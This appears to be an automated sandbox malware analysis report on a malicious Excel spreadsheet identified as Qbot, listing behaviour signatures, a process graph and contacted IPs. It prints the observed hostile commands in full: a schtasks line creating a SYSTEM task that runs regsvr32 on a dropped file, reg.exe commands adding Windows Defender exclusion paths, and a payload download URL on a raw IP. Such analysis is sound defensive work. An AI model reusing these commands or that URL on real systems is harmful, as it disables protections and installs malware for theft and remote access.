Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701E30AA StartServiceCtrlDispatcherA, 14_2_701E30AA
Source: Compensation_Reject-958463727-09292021.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057ABE5 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle, 6_2_7057ABE5
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{A47DAF0F-7FB7-4753-9743-D8AECBE22FD6}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{2EC96162-D66A-45F6-8B30-291D71698D66}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{2EC96162-D66A-45F6-8B30-291D71698D66}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{30331AEC-52A2-4F0B-9335-DB272302A70B}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\Global\{A47DAF0F-7FB7-4753-9743-D8AECBE22FD6}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{30331AEC-52A2-4F0B-9335-DB272302A70B}
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057A55C FindResourceA, 6_2_7057A55C
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: c:\886_Soon\slip\wrong\126\pull.pdb source: regsvr32.exe, 00000006.00000002.811400368.00000000705DD000.00000002.00020000.sdmp, explorer.exe, 00000007.00000003.811813174.0000000002660000.00000004.00000001.sdmp
Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.811519854.0000000002660000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7058A00E push ebx; ret 6_2_7058A00F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7058D485 push FFFFFF8Ah; iretd 6_2_7058D50E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7058D4B6 push FFFFFF8Ah; iretd 6_2_7058D50E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70589D5C push cs; iretd 6_2_70589E32
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70589E5E push cs; iretd 6_2_70589E32
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7058BB21 push esi; iretd 6_2_7058BB26
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7059704B push es; retf 6_2_70596FF5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70596076 push 108F5F56h; ret 6_2_7059607F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70594C6B push eax; iretd 6_2_70594C78
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70592168 push ebx; iretd 6_2_705921E6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_705921CA push ebx; iretd 6_2_705921E6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_705959CA push ebp; iretd 6_2_705959CB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70595E58 push 8BB03089h; retf 6_2_70595E9B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70593A3E push cs; retf 6_2_70593A62
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70598AF9 push esi; retf 6_2_70598B3E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70598B36 push esi; retf 6_2_70598B3E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70596FD6 push es; retf 6_2_70596FF5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70596BFB push ecx; ret 6_2_70596C06
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7062188D push ecx; ret 6_2_7062188E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7062394A push edx; retf 6_2_70623976
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70623E25 push ebx; retf 004Ch 6_2_70623E29
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003DA00E push ebx; ret 7_2_003DA00F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003DD4B6 push FFFFFF8Ah; iretd 7_2_003DD50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003DD485 push FFFFFF8Ah; iretd 7_2_003DD50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003D9D5C push cs; iretd 7_2_003D9E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003D9E5E push cs; iretd 7_2_003D9E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003DBB21 push esi; iretd 7_2_003DBB26
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701FA00E push ebx; ret 14_2_701FA00F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701FD485 push FFFFFF8Ah; iretd 14_2_701FD50E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701FD4B6 push FFFFFF8Ah; iretd 14_2_701FD50E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701F9D5C push cs; iretd 14_2_701F9E32
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057DFEF LoadLibraryA,GetProcAddress, 6_2_7057DFEF
PE file contains an invalid checksum
Source: Drezd.red.15.dr Static PE information: real checksum: 0xbc64f should be: 0x5c7f
Source: Drezd.red.7.dr Static PE information: real checksum: 0xbc64f should be: 0xbe929

Persistence and Installation Behavior:

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe Jump to behavior
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red Jump to dropped file
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44469.4662202546[1].dat Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hhxoksfm /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 11:16 /ET 11:28
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701E30AA StartServiceCtrlDispatcherA, 14_2_701E30AA

Hooking and other Techniques for Hiding and Protection:

barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3032 base: C102D value: E9 9B 4C 30 00 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2800 base: C102D value: E9 9B 4C 2B 00 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep count: 44 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2908 Thread sleep time: -96000s >= -30000s Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 1176 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960 Thread sleep count: 49 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1412 Thread sleep count: 61 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1412 Thread sleep time: -64000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44469.4662202546[1].dat Jump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 6_2_7057D061
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057AEF6 FindFirstFileW,FindNextFileW, 6_2_7057AEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003CAEF6 FindFirstFileW,FindNextFileW, 7_2_003CAEF6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701EAEF6 FindFirstFileW,FindNextFileW, 14_2_701EAEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_0037AEF6 FindFirstFileW,FindNextFileW, 15_2_0037AEF6

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70575F63 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError, 6_2_70575F63
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057DFEF LoadLibraryA,GetProcAddress, 6_2_7057DFEF
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70621DC2 mov eax, dword ptr fs:[00000030h] 6_2_70621DC2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70621C96 mov eax, dword ptr fs:[00000030h] 6_2_70621C96
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_706219A1 push dword ptr fs:[00000030h] 6_2_706219A1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_70291DC2 mov eax, dword ptr fs:[00000030h] 14_2_70291DC2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_70291C96 mov eax, dword ptr fs:[00000030h] 14_2_70291C96
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_702919A1 push dword ptr fs:[00000030h] 14_2_702919A1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003C5A54 RtlAddVectoredExceptionHandler, 7_2_003C5A54
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_00375A54 RtlAddVectoredExceptionHandler, 15_2_00375A54

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: C102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: C102D Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3032 base: 80000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3032 base: C102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2800 base: 80000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2800 base: C102D value: E9 Jump to behavior
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: Compensation_Reject-958463727-09292021.xls, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hhxoksfm /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 11:16 /ET 11:28 Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yenslqus' /d '0' Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gruwmuaixpvu' /d '0' Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: explorer.exe, 00000007.00000002.1075088043.0000000000BD0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.1075088043.0000000000BD0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000007.00000002.1075088043.0000000000BD0000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003C31B5 CreateNamedPipeA, 7_2_003C31B5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_705797ED GetSystemTimeAsFileTime, 6_2_705797ED
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 6_2_7057D061

Stealing of Sensitive Information:

barindex
Yara detected Qbot
Source: Yara match File source: 14.3.regsvr32.exe.4d3169.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.regsvr32.exe.701e0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.explorer.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.3.regsvr32.exe.4d3169.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.explorer.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.243169.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.1074790261.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1074770331.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.806337826.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.881210021.00000000004C0000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Qbot
Source: Yara match File source: 14.3.regsvr32.exe.4d3169.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.regsvr32.exe.701e0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.explorer.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.3.regsvr32.exe.4d3169.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.explorer.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.243169.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.1074790261.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1074770331.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.806337826.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.881210021.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 494138 Sample: Compensation_Reject-9584637... Startdate: 30/09/2021 Architecture: WINDOWS Score: 100 61 Found malware configuration 2->61 63 Document exploit detected (drops PE files) 2->63 65 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->65 67 7 other signatures 2->67 9 EXCEL.EXE 196 36 2->9         started        14 taskeng.exe 1 2->14         started        process3 dnsIp4 49 188.165.62.15, 49167, 80 OVHFR France 9->49 51 45.138.172.22, 80 COMBAHTONcombahtonGmbHDE Germany 9->51 53 45.84.0.123, 80 ALEXHOSTMD Russian Federation 9->53 47 C:\Users\user\...\44469.4662202546[1].dat, PE32 9->47 dropped 79 Document exploit detected (UrlDownloadToFile) 9->79 16 regsvr32.exe 9->16         started        18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 14->22         started        24 regsvr32.exe 14->24         started        file5 signatures6 process7 process8 26 regsvr32.exe 16->26         started        29 regsvr32.exe 22->29         started        31 regsvr32.exe 24->31         started        signatures9 69 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 26->69 71 Injects code into the Windows Explorer (explorer.exe) 26->71 73 Writes to foreign memory regions 26->73 33 explorer.exe 8 1 26->33         started        75 Allocates memory in foreign processes 29->75 77 Maps a DLL or memory area into another process 29->77 36 explorer.exe 8 1 29->36         started        process10 file11 55 Uses cmd line tools excessively to alter registry or file data 33->55 57 Drops PE files to the user root directory 33->57 59 Uses schtasks.exe or at.exe to add and modify task schedules 33->59 39 schtasks.exe 33->39         started        45 C:\Users\user\Drezd.red, PE32 36->45 dropped 41 reg.exe 1 36->41         started        43 reg.exe 1 36->43         started        signatures12 process13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.165.62.15
 unknown France
16276 OVHFR false
45.84.0.123
 unknown Russian Federation
200019 ALEXHOSTMD false
45.138.172.22
 unknown Germany
30823 COMBAHTONcombahtonGmbHDE false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://188.165.62.15/44469.4662202546.dat false
  • Avira URL Cloud: safe
 unknown